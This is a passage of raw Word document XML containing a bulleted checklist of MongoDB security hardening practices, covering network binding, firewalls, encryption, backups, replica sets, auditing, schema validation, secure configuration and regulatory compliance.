          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Bind to Specific IP Addresses</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Configure MongoDB to listen on specific IP addresses to limit exposure to the public internet.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12811ED6" w14:textId="77777777" w:rsidR="00714C5A" w:rsidRPr="00DA2F32" w:rsidRDefault="00714C5A" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="482"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Example: Use the bindIp option in the MongoDB configuration file to restrict connections to trusted networks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E88AD63" w14:textId="77777777" w:rsidR="00714C5A" w:rsidRPr="00DA2F32" w:rsidRDefault="00714C5A" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="482"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Firewall Configuration</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Implement firewall rules to restrict access to the MongoDB server from trusted IP addresses only.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C70B144" w14:textId="77777777" w:rsidR="00714C5A" w:rsidRPr="00DA2F32" w:rsidRDefault="00714C5A" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="482"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Use VPNs for Remote Access</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: If remote access is needed, use a VPN to secure communication between clients and the MongoDB server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A4D52BF"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3. Encryption</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="336C4972" w14:textId="77777777" w:rsidR="00714C5A" w:rsidRPr="00DA2F32" w:rsidRDefault="00714C5A" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="483"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Encryption at Rest</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Enable encryption for data at rest to protect stored data from unauthorized access in case of physical theft or unauthorized access to the storage medium.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C4A6F02" w14:textId="77777777" w:rsidR="00714C5A" w:rsidRPr="00DA2F32" w:rsidRDefault="00714C5A" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="483"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Example: Use MongoDB’s native Encryption at Rest feature, which supports AES encryption.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E917C57" w14:textId="77777777" w:rsidR="00714C5A" w:rsidRPr="00DA2F32" w:rsidRDefault="00714C5A" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="483"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Field-Level Encryption</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: For sensitive data, implement field-level encryption to ensure that only specific fields are encrypted, protecting sensitive information like passwords or personal identifiers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E5BDC91" w14:textId="77777777" w:rsidR="00714C5A" w:rsidRPr="00DA2F32" w:rsidRDefault="00714C5A" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="483"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Example: Use MongoDB's Client-Side Field Level Encryption (CSFLE).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45295AAD"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4. Data Integrity and Backup</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E887AEF" w14:textId="77777777" w:rsidR="00714C5A" w:rsidRPr="00DA2F32" w:rsidRDefault="00714C5A" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="484"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Regular Backups</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Implement regular backups to ensure data recovery in case of corruption, accidental deletion, or system failure. Use MongoDB’s mongodump or third-party backup solutions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34E105BB" w14:textId="77777777" w:rsidR="00714C5A" w:rsidRPr="00DA2F32" w:rsidRDefault="00714C5A" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="484"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Replica Sets</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Deploy MongoDB in a replica set configuration to ensure high availability and data redundancy. This setup allows automatic failover in case of a node failure.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37A5A7C8" w14:textId="77777777" w:rsidR="00714C5A" w:rsidRPr="00DA2F32" w:rsidRDefault="00714C5A" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="484"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Use Write Concerns</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Configure write concerns to ensure that data is written to a specific number of replica set members before confirming a write operation. This reduces the risk of data loss.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69227D1E" w14:textId="77777777" w:rsidR="00714C5A" w:rsidRPr="00DA2F32" w:rsidRDefault="00714C5A" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="484"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Monitor Data Consistency</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Regularly check for and resolve data inconsistencies between replica set members using tools like rs.syncFrom().</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B26E374"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5. Auditing and Monitoring</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DF0C723" w14:textId="77777777" w:rsidR="00714C5A" w:rsidRPr="00DA2F32" w:rsidRDefault="00714C5A" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="485"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Enable Auditing</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Use MongoDB’s auditing capabilities to track access and changes to the database. This helps in identifying unauthorized access and ensuring compliance with security policies.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29145612" w14:textId="77777777" w:rsidR="00714C5A" w:rsidRPr="00DA2F32" w:rsidRDefault="00714C5A" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="485"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Monitor Logs</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Regularly monitor MongoDB logs for suspicious activities such as unauthorized login attempts, slow queries, and replication issues.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C36A78A" w14:textId="77777777" w:rsidR="00714C5A" w:rsidRPr="00DA2F32" w:rsidRDefault="00714C5A" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="485"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Use Monitoring Tools</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Implement monitoring tools like MongoDB Cloud Manager or Prometheus to track performance metrics, resource utilization, and potential security issues.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27C6190C"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6. Data Management and Schema Design</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75BBB8DF" w14:textId="77777777" w:rsidR="00714C5A" w:rsidRPr="00DA2F32" w:rsidRDefault="00714C5A" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="486"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Use Schema Validation</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Implement schema validation to enforce data integrity and ensure that documents adhere to the expected structure.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DB04935" w14:textId="77777777" w:rsidR="00714C5A" w:rsidRPr="00DA2F32" w:rsidRDefault="00714C5A" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="486"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Example: Define validation rules using JSON Schema to restrict document fields, types, and values.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EF55C62" w14:textId="77777777" w:rsidR="00714C5A" w:rsidRPr="00DA2F32" w:rsidRDefault="00714C5A" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="486"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Minimize Data Exposure</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Avoid storing unnecessary sensitive information and use data masking techniques where possible.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15E5E52F" w14:textId="77777777" w:rsidR="00714C5A" w:rsidRPr="00DA2F32" w:rsidRDefault="00714C5A" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="486"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Indexing Strategy</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Use indexes wisely to optimize performance, but avoid over-indexing, as it can impact write performance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F95FDCA"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7. Secure Deployment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2835ED53" w14:textId="77777777" w:rsidR="00714C5A" w:rsidRPr="00DA2F32" w:rsidRDefault="00714C5A" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="487"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Update and Patch Regularly</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Keep MongoDB and its dependencies up to date with the latest security patches and updates to mitigate vulnerabilities.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37DE52CF" w14:textId="77777777" w:rsidR="00714C5A" w:rsidRPr="00DA2F32" w:rsidRDefault="00714C5A" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="487"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Secure Configuration</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Review and harden MongoDB configuration settings. Disable unnecessary features like HTTP interface and scripting engine (javascriptEnabled).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="671B97E1" w14:textId="77777777" w:rsidR="00714C5A" w:rsidRPr="00DA2F32" w:rsidRDefault="00714C5A" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="487"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Avoid Running as Root</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Do not run MongoDB as the root user. Instead, create a dedicated user with limited permissions to run the MongoDB process.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="289E73EC"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8. Compliance and Data Privacy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61D1EEC3" w14:textId="77777777" w:rsidR="00714C5A" w:rsidRPr="00DA2F32" w:rsidRDefault="00714C5A" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="488"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Data Masking</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Mask sensitive data in non-production environments to prevent exposure during development and testing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DC19A5D" w14:textId="77777777" w:rsidR="00714C5A" w:rsidRPr="00DA2F32" w:rsidRDefault="00714C5A" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="488"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Regulatory Compliance</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Ensure that your MongoDB deployment complies with relevant regulations (e.g., GDPR, HIPAA) by implementing appropriate data protection measures.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16CB3BE8" w14:textId="77777777" w:rsidR="00ED3968" w:rsidRPr="00DA2F32" w:rsidRDefault="00ED3968" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="16F9F9B9" w14:textId="77777777" w:rsidR="00BB2F17" w:rsidRPr="00DA2F32" w:rsidRDefault="00BB2F17" w:rsidP="009E0607">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
